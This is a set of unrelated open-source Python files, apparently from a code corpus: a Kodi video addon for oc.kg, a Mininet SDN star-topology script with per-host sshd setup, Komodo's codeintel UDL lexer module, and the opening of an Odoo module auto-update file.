                            'properties': properties,
                            'id': video_id
                        })
                    else:
                        megogo = True
                except:
                    # Malformed entry: skip it.
                    pass
            # if megogo: plugin.notify('Megogo пропущен', BASE_NAME, 1000, get_local_icon('noty_' + BASE_LABEL))
    except:
        default_oc_noty()
    return {'items': items, 'sys_items': sys_items}
# method
def get_search_results(search_value=''):
    """ Query the suggestion endpoint and return matching movies.

    Malformed entries are skipped; on a failed request the default
    notification is shown and an empty list returned.
    """
    entries = []
    try:
        link = BASE_URL + 'suggestion.php?q=' + urllib2.quote(search_value)
        result = common.fetchPage({'link': link})
        kg_stats(BASE_URL, GA_CODE, NK_CODE)

        if result['status'] == 200:
            data = json.loads(result['content'])['json'][0]['response']

            for movie in data['movies']:
                try:
                    label = (movie['name'] + ' | ' + movie['international_name']
                             + ' (' + movie['year'] + ')')
                    entries.append({
                        'label': common.replaceHTMLCodes(label),
                        'icon': BASE_URL + movie['cover'],
                        'id': movie['movie_id']
                    })
                except:
                    pass
    except:
        default_oc_noty()

    return entries
# method
def get_movie(id):
    """ Build the playable entries for one movie.

    The result contains, in order: the trailer (when present), one entry
    per video file ("ПРОСМОТР: ..."), then related titles ("ЕЩЕ: ...")
    linking back to oc_movie.  Returns {'items': [...], 'playlist': bool}
    with 'playlist' True when more than one entry was produced.
    """
    items = []
    try:
        result = common.fetchPage(
            {'link': BASE_API_URL, 'post_data': {'action[0]': 'Video.getMovie', 'movie_id[0]': id}})
        kg_stats(BASE_URL, GA_CODE, NK_CODE)
        if result['status'] == 200:
            data = json.loads(result['content'])
            item = data['json'][0]['response']['movie']
            icon = BASE_URL + item['covers'][0]['original']
            try:
                # Optional trailer entry.
                trailer = item['trailer']
                try:
                    name = trailer['name']
                except:
                    name = 'Трейлер'
                items.append({
                    'title': name,
                    'label': name,
                    'icon': get_local_icon('kinopoisk'),
                    'properties': {'fanart_image': trailer['preview']},
                    'url': trailer['video']
                })
            except:
                pass
            # One entry per playable file; broken entries are skipped.
            for video in item['files']:
                try:
                    label = item['name'] + ': ' + video['name']
                    url = get_playable_url(video['path']) + UserAgent
                    try:
                        fan = video['frames'][0]
                    except:
                        fan = ''
                    properties = {
                        'duration': video['metainfo']['playtime'],
                        'fanart_image': fan,
                    }
                    items.append({
                        'title': label,
                        'label': set_color('ПРОСМОТР: ', 'bold').decode('utf-8') + label,
                        'icon': icon,
                        'properties': properties,
                        'url': url
                    })
                except:
                    # xbmc.log('Exception : ' + str(traceback.format_exc()))
                    continue
            try:
                # Related titles, each linking to its own oc_movie view.
                for other in item['other_movies']:
                    try:
                        try:
                            fan = BASE_URL + other['cover']
                        except:
                            fan = ''
                        properties = {
                            'fanart_image': fan,
                        }
                        items.append({
                            'title': other['name'],
                            'label': set_color('ЕЩЕ: ', 'bold').decode('utf-8') + other['name'],
                            'icon': fan,
                            'properties': properties,
                            'url': plugin.url_for('oc_movie', id=other['movie_id'])
                        })
                    except:
                        # xbmc.log('Exception : ' + str(traceback.format_exc()))
                        continue
            except:
                # xbmc.log('Exception : ' + str(traceback.format_exc()))
                pass
    except:
        default_oc_noty()
    # xbmc.log('Exit list : ' + str(items))
    return {'items': items, 'playlist': True if (len(items) > 1) else False}
def get_playable_url(url):
    """ Map an internal storage path onto the public streaming host URL. """
    internal_prefix = '/home/video/'
    public_prefix = 'http://p0.oc.kg:8080/'
    return str(url).replace(internal_prefix, public_prefix)
| delletenebre/xbmc-addon-kilogramme | plugin.video.kilogramme/resources/lib/site_ockg.py | Python | gpl-3.0 | 20,423 | 0.0036 |
#!/usr/bin/python

# Network id (used in switch names/dpids) and number of leaf nodes.
NWID=1
NR_NODES=20

# Remote OpenFlow controller(s) the network attaches to.
#Controllers=[{"ip":'127.0.0.1', "port":6633}, {"ip":'10.0.1.28', "port":6633}]
Controllers=[{"ip":'10.0.1.28', "port":6633}]

"""
Start up a Simple topology
"""
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.log import setLogLevel, info, error, warn, debug
from mininet.cli import CLI
from mininet.topo import Topo
from mininet.util import quietRun
from mininet.moduledeps import pathCheck
from mininet.link import Link, TCLink
from sys import exit
import os.path
from subprocess import Popen, STDOUT, PIPE
import sys
#import argparse
class MyController( Controller ):
    """Controller stub for an externally managed (remote) controller:
    Mininet does not start or stop the process, it only records where it
    listens and warns when it is unreachable."""

    def __init__( self, name, ip='127.0.0.1', port=6633, **kwargs):
        """Init.
           name: name to give controller
           ip: the IP address where the remote controller is
           listening
           port: the port where the remote controller is listening"""
        Controller.__init__( self, name, ip=ip, port=port, **kwargs )

    def start( self ):
        "Overridden to do nothing."
        return

    def stop( self ):
        "Overridden to do nothing."
        return

    def checkListening( self ):
        "Warn if remote controller is not accessible"
        # Probe the port with telnet; 'A' is set as the escape character
        # and piped in so the session terminates immediately.
        listening = self.cmd( "echo A | telnet -e A %s %d" %
                              ( self.ip, self.port ) )
        if 'Unable' in listening:
            warn( "Unable to contact the remote controller"
                  " at %s:%d\n" % ( self.ip, self.port ) )
class SDNTopo( Topo ):
    "SDN Topology: a star of NR_NODES switches, one host (plus a root-"
    "namespace node) hanging off each switch."

    def __init__( self, *args, **kwargs ):
        Topo.__init__( self, *args, **kwargs )

        switches = []
        hosts = []
        roots = []

        # One switch per node; dpid encodes the network and node ids.
        for n in range( NR_NODES ):
            suffix = '%02d.%02d' % ( NWID, n )
            dpid = '000000000000' + '%02x%02x' % ( NWID, n )
            switches.append( self.addSwitch( 'sw' + suffix, dpid=dpid ) )

        for n in range( NR_NODES ):
            hosts.append( self.addHost( 'host%d' % n ) )

        for n in range( NR_NODES ):
            roots.append( self.addHost( 'root%d' % n, inNamespace=False ) )

        # Each host attaches to its own switch ...
        for n in range( NR_NODES ):
            self.addLink( hosts[ n ], switches[ n ] )

        # ... switch 0 is the hub of the star ...
        for n in range( 1, NR_NODES ):
            self.addLink( switches[ 0 ], switches[ n ] )

        # ... and each root node links to its host.
        for n in range( NR_NODES ):
            self.addLink( roots[ n ], hosts[ n ] )
def startsshd( host ):
    "Start sshd on host"
    info( '*** Starting sshd\n' )
    name = host.name
    intf = host.defaultIntf()
    ip = host.IP()
    # Write a per-host banner file; stopsshd() later kills daemons by
    # matching the "Banner" argument.
    banner = '/tmp/%s.banner' % name
    host.cmd( 'echo "Welcome to %s at %s" > %s' % ( name, ip, banner ) )
    host.cmd( '/usr/sbin/sshd -o "Banner %s"' % banner, '-o "UseDNS no"' )
    info( '***', name, 'is running sshd on', intf, 'at', ip, '\n' )
def startsshds ( hosts ):
    "Start an sshd instance on each of the given hosts."
    for host in hosts:
        startsshd( host )
def stopsshd( ):
    "Stop *all* sshd processes with a custom banner"
    output = quietRun( "pkill -9 -f Banner" )
    info( '*** Shutting down stale sshd/Banner processes ', output, '\n' )
def sdnnet(opt):
    """ Build and start the network; opt == "cli" drops into the Mininet CLI
    (and tears the network down on exit). """
    topo = SDNTopo()
    info( '*** Creating network\n' )
    #net = Mininet( topo=topo, controller=MyController, link=TCLink)
    net = Mininet( topo=topo, link=TCLink, build=False)

    # Attach every configured remote controller before building.
    controllers=[]
    for c in Controllers:
        rc = RemoteController('c%d' % Controllers.index(c), ip=c['ip'],port=c['port'])
        print "controller ip %s port %s" % (c['ip'], c['port'])
        controllers.append(rc)

    net.controllers=controllers
    net.build()

    host = []
    for i in range (NR_NODES):
        host.append(net.get( 'host%d' % i ))

    net.start()

    # Hub switch of the star (sw<NWID>.00).
    # NOTE(review): 'sw01.00' and 'tapa0' are hard-coded -- this assumes
    # NWID == 1 and a pre-created tap interface; confirm before reuse.
    sw=net.get('sw01.00')
    print "center sw", sw
    sw.attach('tapa0')

    # Data-plane addresses on each host's default interface.
    for i in range (NR_NODES):
        host[i].defaultIntf().setIP('192.168.%d.%d/16' % (NWID,i))

    root = []
    for i in range (NR_NODES):
        root.append(net.get( 'root%d' % i ))

    # Point-to-point /24 between each host and its root-namespace peer,
    # giving the host OS a path to each node (e.g. for the sshd below).
    for i in range (NR_NODES):
        host[i].intf('host%d-eth1' % i).setIP('1.1.%d.1/24' % i)
        root[i].intf('root%d-eth0' % i).setIP('1.1.%d.2/24' % i)

    # Replace any stale sshd instances with fresh ones on every host.
    stopsshd ()
    startsshds ( host )

    if opt=="cli":
        CLI(net)
        stopsshd()
        net.stop()
if __name__ == '__main__':
    setLogLevel( 'info' )
    # No arguments: run with the interactive CLI.
    # "-n": build and start the network without entering the CLI.
    if len(sys.argv) == 1:
        sdnnet("cli")
    elif len(sys.argv) == 2 and sys.argv[1] == "-n":
        sdnnet("nocli")
    else:
        print "%s [-n]" % sys.argv[0]
#!python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
"""UDL (User-Defined Language) support for codeintel."""
import os
from os.path import dirname, join, abspath, normpath, basename, exists
import sys
import re
import logging
import threading
import operator
import traceback
from pprint import pprint, pformat
import SilverCity
from SilverCity import ScintillaConstants
from SilverCity.ScintillaConstants import * # XXX import only what we need
from SilverCity.Lexer import Lexer
from codeintel2.common import *
from codeintel2.citadel import CitadelBuffer
# from codeintel2.javascript_common import trg_from_pos as
# javascript_trg_from_pos
if _xpcom_:
from xpcom import components
from xpcom.server import UnwrapObject
import directoryServiceUtils
log = logging.getLogger("codeintel.udl")
# log.setLevel(logging.DEBUG)

# XXX We need to have a better mechanism for rationalizing and sharing
# common lexer style classes. For now we'll just HACKily grab from
# Komodo's styles.py. Some of this is duplicating logic in
# KoLanguageServiceBase.py.
# Temporarily prepend the "schemes" dir (three levels up from this file)
# to sys.path so `styles` can be imported, then restore sys.path and drop
# the helper variable so the hack leaves no trace in module globals.
_ko_src_dir = normpath(join(dirname(__file__), *([os.pardir]*3)))
sys.path.insert(0, join(_ko_src_dir, "schemes"))
try:
    import styles
finally:
    del sys.path[0]
del _ko_src_dir
#---- module interface
# Test 'udl/general/is_udl_x_style' tests these.
def is_udl_m_style(style):
    """True if *style* falls in the UDL markup (M) style range."""
    return (style >= ScintillaConstants.SCE_UDL_M_DEFAULT and
            style <= ScintillaConstants.SCE_UDL_M_COMMENT)
def is_udl_css_style(style):
    """True if *style* falls in the UDL CSS style range."""
    return (style >= ScintillaConstants.SCE_UDL_CSS_DEFAULT and
            style <= ScintillaConstants.SCE_UDL_CSS_OPERATOR)
def is_udl_csl_style(style):
    """True if *style* falls in the UDL client-side language (CSL) range."""
    return (style >= ScintillaConstants.SCE_UDL_CSL_DEFAULT and
            style <= ScintillaConstants.SCE_UDL_CSL_REGEX)
def is_udl_ssl_style(style):
    """True if *style* falls in the UDL server-side language (SSL) range."""
    return (style >= ScintillaConstants.SCE_UDL_SSL_DEFAULT and
            style <= ScintillaConstants.SCE_UDL_SSL_VARIABLE)
def is_udl_tpl_style(style):
    """True if *style* falls in the UDL template language (TPL) range."""
    return (style >= ScintillaConstants.SCE_UDL_TPL_DEFAULT and
            style <= ScintillaConstants.SCE_UDL_TPL_VARIABLE)
# XXX Redundant code from koUDLLanguageBase.py::KoUDLLanguage
# Necessary because SilverCity.WordList splits input on white-space
_re_bad_filename_char = re.compile(r'([% \x80-\xff])')
def _lexudl_path_escape(m):
return '%%%02X' % ord(m.group(1))
def _urlescape(s):
return _re_bad_filename_char.sub(_lexudl_path_escape, s)
class UDLLexer(Lexer):
    """LexUDL wants the path to the .lexres file as the first element of
    the first keywords list.
    """
    # Class-wide lock: all tokenizing is serialized through it because
    # LexUDL.cxx currently isn't thread-safe (see tokenize_by_style).
    _lock = threading.Lock()
    # Lazily-built cache: lowered language name -> .lexres file path.
    _lexresfile_from_lang = None
    # Extra lexer dirs registered via add_extra_lexer_dirs().
    _extra_lexer_dirs = set()

    def __init__(self):
        """Set up the SilverCity UDL lexer with this language's .lexres path."""
        self._properties = SilverCity.PropertySet()
        self._lexer = SilverCity.find_lexer_module_by_id(
            ScintillaConstants.SCLEX_UDL)
        # The path is %-escaped because SilverCity.WordList splits its
        # input on whitespace.
        lexres_path = _urlescape(self._get_lexres_path())
        log.debug("escaped lexres_path: %r", lexres_path)
        self._keyword_lists = [
            SilverCity.WordList(lexres_path),
        ]

    def tokenize_by_style(self, text, call_back=None):
        """LexUDL.cxx currently isn't thread-safe."""
        self._lock.acquire()
        try:
            return Lexer.tokenize_by_style(self, text, call_back)
        finally:
            self._lock.release()

    @staticmethod
    def add_extra_lexer_dirs(dirs):
        """Register extra dirs to search for .lexres files.

        Invalidates the cached lang -> lexres mapping so the new dirs are
        picked up on the next lookup.
        """
        UDLLexer._extra_lexer_dirs.update(dirs)
        UDLLexer._lexresfile_from_lang = None

    if _xpcom_:
        # Presume we are running under Komodo. Look in the available
        # lexres dirs from extensions.
        @staticmethod
        def _generate_lexer_mapping():
            """Return dict {name > filename} of all lexer resource files (i.e.
            those ones that can include compiled UDL .lexres files).

            It yields directories that should "win" first.
            """
            from glob import glob
            lexresfile_from_lang = {}
            koDirs = components.classes["@activestate.com/koDirs;1"] \
                .getService(components.interfaces.koIDirs)

            # Find all possible lexer dirs.
            lexer_dirs = []
            lexer_dirs.append(join(koDirs.userDataDir, "lexers")) # user
            for extensionDir in directoryServiceUtils.getExtensionDirectories():
                lexer_dirs.append(join(
                    extensionDir, "lexers")) # user-install extensions
            lexer_dirs.append(join(
                koDirs.commonDataDir, "lexers")) # site/common
            lexer_dirs.append(join(koDirs.supportDir, "lexers")) # factory
            for extra_dir in UDLLexer._extra_lexer_dirs:
                lexer_dirs.append(extra_dir)

            # Find all .lexeres files in these lexer dirs.
            # Iterate in reverse so earlier (higher-priority) dirs
            # overwrite entries from later ones.
            for d in reversed(lexer_dirs): # first come, first served
                lexer_files = glob(join(d, "*.lexres"))
                for f in lexer_files:
                    # Get lowered name without the ".lexres" extension.
                    name = basename(f).lower().rsplit(".", 1)[0]
                    lexresfile_from_lang[name] = f

            return lexresfile_from_lang
    else:
        @staticmethod
        def _generate_lexer_mapping():
            """Return dict {name > filename} of all lexer resource files (i.e.
            those ones that can include compiled UDL .lexres files).

            It yields directories that should "win" first.
            """
            from glob import glob
            lexresfile_from_lang = {}
            # Find all possible lexer dirs.
            lexer_dirs = []
            lexer_dirs.append(join(dirname(__file__), "lexers"))
            for extra_dir in UDLLexer._extra_lexer_dirs:
                lexer_dirs.append(extra_dir)
            # Find all .lexeres files in these lexer dirs.
            # Iterate in reverse so earlier (higher-priority) dirs
            # overwrite entries from later ones.
            for d in reversed(lexer_dirs): # first come, first served
                lexer_files = glob(join(d, "*.lexres"))
                for f in lexer_files:
                    # Get lowered name without the ".lexres" extension.
                    name = basename(f).lower().rsplit(".", 1)[0]
                    lexresfile_from_lang[name] = f
            return lexresfile_from_lang

    def _get_lexres_path(self):
        """Return the .lexres file path for self.lang, building the cached
        mapping on first use.  Raises CodeIntelError when no lexres file
        exists for the language."""
        lexresfile_from_lang = UDLLexer._lexresfile_from_lang
        if lexresfile_from_lang is None:
            # Generate and cache it.
            lexresfile_from_lang = self._generate_lexer_mapping()
            UDLLexer._lexresfile_from_lang = lexresfile_from_lang

        lexres_file = lexresfile_from_lang.get(self.lang.lower())
        if lexres_file is None:
            raise CodeIntelError("could not find lexres file for %s: "
                                 "`%s.lexres' does not exist in any "
                                 "of the lexer dirs"
                                 % (self.lang, self.lang))
        return lexres_file
class UDLBuffer(CitadelBuffer):
    """A CodeIntel Buffer for a UDL-lexer-based language."""
    sce_prefixes = ["SCE_UDL_"]

    # XXX Not sure that this indirection will be useful, but we'll see.
    # Sub-classes must set the following of these that are appropriate:
    # each holds the name of the language handling that UDL family
    # (M/CSS/CSL/SSL/TPL), or None when the family is unused.
    m_lang = None
    css_lang = None
    csl_lang = None
    ssl_lang = None
    tpl_lang = None
def lang_from_style(self, style):
if (ScintillaConstants.SCE_UDL_M_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_M_COMMENT):
return self.m_lang
elif (ScintillaConstants.SCE_UDL_CSS_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_CSS_OPERATOR):
return self.css_lang
elif (ScintillaConstants.SCE_UDL_CSL_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_CSL_REGEX):
return self.csl_lang
elif (ScintillaConstants.SCE_UDL_SSL_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_SSL_VARIABLE):
return self.ssl_lang
elif (ScintillaConstants.SCE_UDL_TPL_DEFAULT <= style
<= ScintillaConstants.SCE_UDL_TPL_VARIABLE):
return self.tpl_lang
else:
raise ValueError("unknown UDL style: %r" % style)
def lang_from_pos(self, pos):
style = self.accessor.style_at_pos(pos)
return self.lang_from_style(style)
    # Cache for the udl_family_from_lang property (built on first access).
    _udl_family_from_lang_cache = None

    @property
    def udl_family_from_lang(self):
        """Map sub-language name -> UDL family code ("M", "CSS", "CSL",
        "SSL" or "TPL")."""
        if self._udl_family_from_lang_cache is None:
            # NOTE(review): the filter `L is not None` can never be false
            # (L is always a literal family string); it looks like
            # `uf is not None` was intended, so unset languages currently
            # end up as a None key in the mapping -- confirm before fixing,
            # since text_chunks_from_lang's len()==1 fast path depends on
            # this dict's size.
            self._udl_family_from_lang_cache = dict(
                (uf, L) for (uf, L) in [
                    (self.m_lang, "M"),
                    (self.css_lang, "CSS"),
                    (self.csl_lang, "CSL"),
                    (self.ssl_lang, "SSL"),
                    (self.tpl_lang, "TPL"),
                ]
                if L is not None
            )
        return self._udl_family_from_lang_cache
def text_chunks_from_lang(self, lang):
"""Generate a list of text chunks of the given language content.
For a single-language buffer this is trivial: 1 chunk of the whole
buffer. For multi-language buffers, less so.
Generates 2-tuples:
(POSITION-OFFSET, TEXT-CHUNK)
"""
udl_family_from_lang = self.udl_family_from_lang
if len(udl_family_from_lang) == 1:
yield 0, self.accessor.text
elif lang not in udl_family_from_lang:
pass
elif hasattr(self.accessor, "udl_family_chunk_ranges"):
udl_family = self.udl_family_from_lang[lang]
text = self.accessor.text # Note: assuming here that `text` is in *bytes*
for u, start, end in self.accessor.udl_family_chunk_ranges:
if u == udl_family:
yield start, text[start:end]
else:
min_style, max_style = {
self.m_lang: (ScintillaConstants.SCE_UDL_M_DEFAULT,
ScintillaConstants.SCE_UDL_M_COMMENT),
self.css_lang: (ScintillaConstants.SCE_UDL_CSS_DEFAULT,
ScintillaConstants.SCE_UDL_CSS_OPERATOR),
self.csl_lang: (ScintillaConstants.SCE_UDL_CSL_DEFAULT,
ScintillaConstants.SCE_UDL_CSL_REGEX),
self.ssl_lang: (ScintillaConstants.SCE_UDL_SSL_DEFAULT,
ScintillaConstants.SCE_UDL_SSL_VARIABLE),
self.tpl_lang: (ScintillaConstants.SCE_UDL_TPL_DEFAULT,
ScintillaConstants.SCE_UDL_TPL_VARIABLE),
}[lang]
in_chunk = False
pos_offset = None
text = self.accessor.text
for token in self.accessor.gen_tokens():
if in_chunk:
if not (min_style <= token["style"] <= max_style):
# SilverCity indeces are inclusive at the end.
end_index = token["end_index"] + 1
yield pos_offset, text[pos_offset:end_index]
in_chunk = False
else:
if min_style <= token["style"] <= max_style:
in_chunk = True
pos_offset = token["start_index"]
if in_chunk:
yield pos_offset, text[pos_offset:]
def scoperef_from_pos(self, pos):
"""Return the scoperef for the given position in this buffer.
A "scoperef" is a 2-tuple:
(<blob>, <lpath>)
where <blob> is the ciElementTree blob for the buffer content
and <lpath> is an ordered list of names into the blob
identifying the scope.
If no relevant scope is found (e.g. for example, in markup
content in PHP) then None is returned.
See Buffer.scoperef_from_pos() docstring for more details.
"""
lang = self.lang_from_pos(pos)
try:
blob = self.blob_from_lang[lang]
except KeyError:
return None
line = self.accessor.line_from_pos(pos) + 1 # convert to 1-based
return self.scoperef_from_blob_and_line(blob, line)
def trg_from_pos(self, pos, implicit=True, trigger_type="both"):
if pos == 0:
return None
lang = self.lang_from_pos(pos-1)
if lang is None:
style = self.accessor.style_at_pos(pos)
style_names = self.style_names_from_style_num(style)
raise CodeIntelError("got unexpected style in `%s': %s %s"
% (basename(self.path), style, style_names))
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return None
return langintel.trg_from_pos(self, pos, implicit=implicit, trigger_type=trigger_type)
def preceding_trg_from_pos(self, pos, curr_pos, trigger_type="both"):
if curr_pos == 0:
return None
lang = self.lang_from_pos(curr_pos-1)
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return None
return langintel.preceding_trg_from_pos(self, pos, curr_pos, trigger_type=trigger_type)
def curr_calltip_arg_range(self, trg_pos, calltip, curr_pos):
if curr_pos == 0:
return None
lang = self.lang_from_pos(curr_pos-1)
try:
langintel = self.mgr.langintel_from_lang(lang)
except KeyError:
return (-1, -1)
try:
return langintel.curr_calltip_arg_range(self, trg_pos, calltip,
curr_pos)
except AttributeError:
# This can happen if we accidentally move into a non-programming
# language during a calltip. E.g. bug 69529. Cancel the calltip
# in this case.
return (-1, -1)
def async_eval_at_trg(self, trg, ctlr):
try:
langintel = self.mgr.langintel_from_lang(trg.lang)
except KeyError:
return None
return langintel.async_eval_at_trg(self, trg, ctlr)
# Override Citadel.defn_trg_from_pos()
def defn_trg_from_pos(self, pos, lang=None):
# Work out the language from the position, as the citadel buffer will
# use the buffer language, we want a language specific to this pos.
return CitadelBuffer.defn_trg_from_pos(self, pos,
lang=self.lang_from_pos(pos))
def libs(self):
"""A simple `.libs' property does not work for multi-lang buffers.
Use `.libs_from_lang(lang)' instead.
"""
raise RuntimeError("`.libs' invalid for multi-lang buffers: use "
"`mgr.langintel_from_lang(lang).libs_from_buf(buf)' "
"directly")
def style_names_from_style_num(self, style_num):
# XXX Would like to have python-foo instead of p_foo or SCE_P_FOO, but
# that requires a more comprehensive solution for all langs and
# multi-langs.
style_names = []
# Get the constant name from ScintillaConstants.
if "UDL" not in self._style_name_from_style_num_from_lang:
name_from_num \
= self._style_name_from_style_num_from_lang["UDL"] = {}
if self.sce_prefixes is None:
raise CodeIntelError("'sce_prefixes' not set on class %s: cannot "
"determine style constant names"
% self.__class__.__name__)
for attr in dir(ScintillaConstants):
for sce_prefix in self.sce_prefixes:
if attr.startswith(sce_prefix):
name_from_num[getattr(ScintillaConstants, attr)] = attr
else:
name_from_num \
= self._style_name_from_style_num_from_lang["UDL"]
const_name = name_from_num[style_num]
style_names.append(const_name)
# Get a style group from styles.py.
if "UDL" in styles.StateMap:
for style_group, const_names in list(styles.StateMap["UDL"].items()):
if const_name in const_names:
style_names.append(style_group)
break
else:
log.warn("lang '%s' not in styles.StateMap: won't have "
"common style groups in HTML output" % "UDL")
return style_names
__string_styles = None
def string_styles(self):
if self.__string_styles is None:
state_map = styles.StateMap["UDL"]
self.__string_styles = [
getattr(ScintillaConstants, style_name)
for style_class in ("strings", "stringeol")
for style_name in state_map.get(style_class, [])
]
return self.__string_styles
__comment_styles = None
def comment_styles(self):
if self.__comment_styles is None:
state_map = styles.StateMap["UDL"]
self.__comment_styles = [
getattr(ScintillaConstants, style_name)
for style_class in ("comments", "here documents",
"data sections")
for style_name in state_map.get(style_class, [])
]
return self.__comment_styles
__number_styles = None
def number_styles(self):
if self.__number_styles is None:
state_map = styles.StateMap["UDL"]
self.__number_styles = [
getattr(ScintillaConstants, style_name)
for style_class in ("numbers",)
for style_name in state_map.get(style_class, [])
]
return self.__number_styles
class XMLParsingBufferMixin(object):
    """A mixin for UDLBuffer-based buffers of XML-y/HTML-y languages to
    support the following:
    - An "xml_tree" attribute that is a XML parse tree of the document
      (lazily done from koXMLTreeService)
    - An "xml_parse()" method to force a re-parse of the document.
    TODO: locking?
    """
    _xml_tree_cache = None
    _xml_default_dataset_info = None
    @property
    def xml_tree(self):
        """The XML parse tree of the document (parsed on first access)."""
        if self._xml_tree_cache is None:
            self.xml_parse()
        return self._xml_tree_cache
    def xml_parse(self):
        """(Re-)parse the buffer content and cache the resulting tree."""
        from koXMLTreeService import getService
        path = self.path
        if isUnsavedPath(self.path):
            # The "<Unsaved>/..." special path can *crash* Python if trying to
            # open it. Besides, the "<Unsaved>" business is an internal
            # codeintel detail.
            path = None
        self._xml_tree_cache = getService().getTreeForURI(
            path, self.accessor.text)
    def xml_default_dataset_info(self, node=None):
        """Return (and cache) a 3-tuple of (default public id, None,
        default namespace) from the koXMLDatasetInfo service.
        `node` is currently unused."""
        if self._xml_default_dataset_info is None:
            import koXMLDatasetInfo
            datasetSvc = koXMLDatasetInfo.getService()
            self._xml_default_dataset_info = (
                datasetSvc.getDefaultPublicId(self.m_lang, self.env),
                None,
                datasetSvc.getDefaultNamespace(self.m_lang, self.env))
        return self._xml_default_dataset_info
    def xml_tree_handler(self, node=None):
        """Return the dataset tree handler for the cached XML tree."""
        import koXMLDatasetInfo
        return koXMLDatasetInfo.get_tree_handler(self._xml_tree_cache, node, self.xml_default_dataset_info(node))
    def xml_node_at_pos(self, pos):
        """Return the XML node at buffer position `pos`, or None.

        Forces a re-parse first. When the tree is dirty (e.g. the tag at
        `pos` is still being typed), attempts to synthesize a node from
        the text of the nearest preceding '<'.
        """
        import koXMLTreeService
        self.xml_parse()
        tree = self._xml_tree_cache
        if not tree:
            return None
        line, col = self.accessor.line_and_col_at_pos(pos)
        node = tree.locateNode(line, col)
        # XXX this needs to be worked out better
        last_start = self.accessor.text.rfind('<', 0, pos)
        last_end = self.accessor.text.find('>', last_start, pos)
        if node is None and last_start >= 0:
            # No located node: try building one from the raw tag text.
            node = koXMLTreeService.elementFromText(
                tree, self.accessor.text[last_start:last_end], node)
        if node is None or node.start is None:
            return node
        # elementtree line numbers are 1 based, convert to zero based
        node_pos = self.accessor.pos_from_line_and_col(
            node.start[0]-1, node.start[1])
        if last_end == -1 and last_start != node_pos:
            # print "try parse ls %d le %d np %d pos %d %r" % (last_start, last_end, node_pos, pos, accessor.text[last_start:pos])
            # we have a dirty tree, need to create a current node and add it
            newnode = koXMLTreeService.elementFromText(
                tree, self.accessor.text[last_start:pos], node)
            if newnode is not None:
                return newnode
        return node
class _NotYetSet(object):
# Used below to distinguish from None.
pass
class UDLCILEDriver(CILEDriver):
    """CILE driver for multi-lang (UDL) buffers: delegates scanning to the
    drivers of the server-side and/or client-side sub-languages."""
    ssl_lang = None   # Sub-classes must set one or both of these for
    csl_lang = None   # citadel-scanning support.
    _master_cile_driver = None
    slave_csl_cile_driver = _NotYetSet  # to distinguish from None
    @property
    def master_cile_driver(self):
        """The primary CILE driver for this multi-lang lang.
        This is the CILE driver for the SSL lang, if there is one, otherwise
        for the csl_lang.
        Side effect: `self.slave_csl_cile_driver' is determined the
        first time this is called. A little gross, I know, but it
        avoids having a separate property.
        """
        if self._master_cile_driver is None:
            if self.ssl_lang is not None:
                # Server-side lang present: it is the master, the
                # client-side driver becomes the slave.
                self._master_cile_driver \
                    = self.mgr.citadel.cile_driver_from_lang(self.ssl_lang)
                self.slave_csl_cile_driver \
                    = self.mgr.citadel.cile_driver_from_lang(self.csl_lang)
            else:
                # No server-side lang: the client-side driver is master.
                self._master_cile_driver \
                    = self.mgr.citadel.cile_driver_from_lang(self.csl_lang)
                self.slave_csl_cile_driver = None
        return self._master_cile_driver
    def scan_purelang(self, buf):
        """Scan `buf` with the master driver, passing the slave along."""
        log.info("scan_purelang: path: %r lang: %s", buf.path, buf.lang)
        return self.master_cile_driver.scan_multilang(
            buf, self.slave_csl_cile_driver)
| anisku11/sublimeku | Packages/CodeComplice/libs/codeintel2/udl.py | Python | mit | 23,772 | 0.000463 |
# -*- coding: utf-8 -*-
# Copyright 2017 LasLabs Inc.
# Copyright 2018 ACSONE SA/NV.
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
import json
import logging
import os
from openerp import api, exceptions, models, tools
from openerp.modules.module import get_module_path
from ..addon_hash import addon_hash
# ir.config_parameter key holding the JSON map of module name -> checksum
# saved at the last successful checksum upgrade.
PARAM_INSTALLED_CHECKSUMS = \
    'module_auto_update.installed_checksums'
# ir.config_parameter key holding comma-separated glob patterns of files
# to exclude from the checksum computation.
PARAM_EXCLUDE_PATTERNS = \
    'module_auto_update.exclude_patterns'
# Fallback exclusion patterns used when the parameter above is unset.
DEFAULT_EXCLUDE_PATTERNS = \
    '*.pyc,*.pyo,i18n/*.pot,i18n_extra/*.pot,static/*'
_logger = logging.getLogger(__name__)
class FailedUpgradeError(exceptions.Warning):
    """Raised when the upgrade cannot proceed safely (e.g. modules are
    not in the expected state)."""
    pass
class IncompleteUpgradeError(exceptions.Warning):
    """Raised when modules remain partially installed/upgraded after an
    otherwise successful upgrade run."""
    pass
def ensure_module_state(env, modules, state):
    """Assert every module in `modules` is in `state`, or raise.

    Reads the module states straight from the database, bypassing any
    Odoo ORM cache, and raises FailedUpgradeError naming the offending
    modules when any is in a different state. No-op for an empty set.
    """
    if not modules:
        return
    env.cr.execute(
